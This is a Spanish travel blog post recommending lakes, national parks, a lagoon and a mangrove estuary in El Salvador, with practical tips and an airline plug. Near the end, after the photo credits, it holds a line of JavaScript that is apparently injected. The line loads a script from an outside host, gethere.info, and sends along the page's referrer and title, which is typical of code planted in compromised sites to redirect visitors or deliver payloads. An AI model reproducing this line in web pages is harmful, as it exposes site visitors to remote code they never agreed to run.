Ninfas en El Pulgarcito de América

11/12/2013

Amanecer en Cerro de San Jacinto, en El SalvadorQue levanten la mano quienes tengan espíritu aventurero. Este post va dirigido a todas esas personas enamoradas de los paisajes, los deportes de naturaleza y el mundo sin asfalto. En El Salvador, un país tan pequeñito que se ha ganado el sobrenombre de ‘El Pulgarcito de América’, existen volcanes, playas, bosques y lagunas para soñar con un mundo más verde. Aunque hay infinidad de paisajes, aquí proponemos 4 para desconectar del estrés. ¿Recomiendas alguno más?

Lago de Coatepeque: Su descubrimiento, desde lo alto de la montaña, impresiona. Ubicado en las faldas del volcán de Santa Ana, este lago tiene, además de agua, dos pequeñas penínsulas rocosas denominadas anteojos y una isla. La ínsula, llamada del Cerro o Teopán, fue el lugar donde los indígenas pipiles tenían un templo de la diosa Izqueye. Sienta esa magia y contemple los espectaculares atardeceres. No hay que irse de aquí si practicar algún deporte, como buceo, esquí acuático, kayak o senderismo.

Parque nacional el imposibleParques Nacionales de El Imposible y Montecristo. En el primero será imposible no ver ninguna mariposa, ya que existen 500 especies distintas. Este bosque tropical de montaña es, además, el último refugio de muchos animales y plantas en peligro de extinción. Maravíllese con sus ríos, como el Cara Sucia y el Guayapa, y las hipnotizantes cascadas que surgen cuando uno menos se lo espera. El Parque de Montecristo, por su parte, tiene lugares para acampar y es el hogar de un animal que nunca hubiésemos imaginado que existe: la musaraña negra. Pinos, encinas y cipreses nos acompañan en los caminos de este bosque húmedo donde también nos encontramos con cultivos de caña de azúcar y café.

Laguna de las Ninfas. Si uno acude a este lugar con alguna preocupación, ésta se esfuma de inmediato. El paisaje de la Laguna de las Ninfas, llamada así por estas plantas acuáticas, es uno de los más bonitos de todo El Salvador. De origen volcánico, este bosque es perfecto para pasear y contemplar la gran cantidad de orquídeas que aparecen por sus caminos.

Estero de JaltepequeEstero de Jaltepeque. Palmeras, barcos, el azul del agua, el verde de la vegetación… El Estero de Jaltepeque es un bosque salado. Quien lo visite podrá navegar por los canales repletos de manglares y tendrá la posibilidad de darse un paseo en lancha desde la Playa La Puntilla mar adentro. Cerca queda la Isla de Tasajera, con la Playa de Los Negros, donde descansar y probar platos de pescado y marisco en alguno de sus restaurantes. Cierre los ojos. Querrá vivir así para siempre.

Datos útiles:

  • El Salvador es uno de los países más pequeños de Centroamérica, aunque está densamente poblado.
  • No hay vacunas obligatorias, pero se recomiendan algunas, como la tetánica y las de las hepatitis A y B.
  • La meteorología es benigna, pero en ocasiones se producen lluvias fuertes, huracanes y terremotos.
  • La moneda es el dólar.
  • Llevar mosquiteras para la cama y cremas antimosquitos.
  • Iberia ofrece vuelos a El Salvador desde Madrid. Los mejores precios siempre los encontrará en Iberia.com.

Fotos |  lexdjelectronic,  cheleguanacoMario Pleitez

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO